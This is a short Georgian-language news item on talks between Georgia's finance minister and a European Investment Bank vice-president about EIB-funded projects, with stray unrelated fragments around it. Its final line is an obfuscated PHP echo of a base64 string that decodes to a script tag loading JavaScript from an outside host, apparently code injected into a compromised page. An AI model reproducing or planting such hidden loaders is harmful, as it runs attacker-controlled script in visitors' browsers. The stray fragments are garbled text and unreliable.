celsiusi
ავერსი შნაიდერი
ევროპის საინვესტიციო ბანკსა (EIB) და საქართველოს შორის თანამშრომლობის საკითხები განიხილეს ფინანსთა მინისტრმა, ლაშა ხუციშვილმა და EIB-ის ვიცე-პრეზიდენტმა, ტერეზა ჩერვინსკაიამ საერთაშორისო სავალუტო ფონდისა და მსოფლიო ბანკის ჯგუფის ყოველწლიური საგაზაფხულო შეხვედრის ფარგლებში გამართული შეხვედრისას.

 

საუბარი შეეხო იმ პროექტების მიმდინარეობას, რომელსაც ევროპის საინვესტიციო ბანკი ახორციელებს ქვეყნისთვის პრიორიტეტული მიმართულებების მხარდასაჭერად. აღსანიშნავია, რომ EIB საქართველოს ერთ-ერთი ყველაზე მსხვილი პარტნიორი და ინვესტორია ქვეყნის ინფრასტრუქტურის განვითარების პროცესში. ხაზი გაესვა EIB-ის ჩართულობას კერძო სექტორის გაძლიერების კუთხით.

შეხვედრას დაესწრნენ ფინანსთა მინისტრის მოადგილეები: გიორგი კაკაურიძე, მირზა გელაშვილი და ეკატერინე გუნცაძე.

415
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");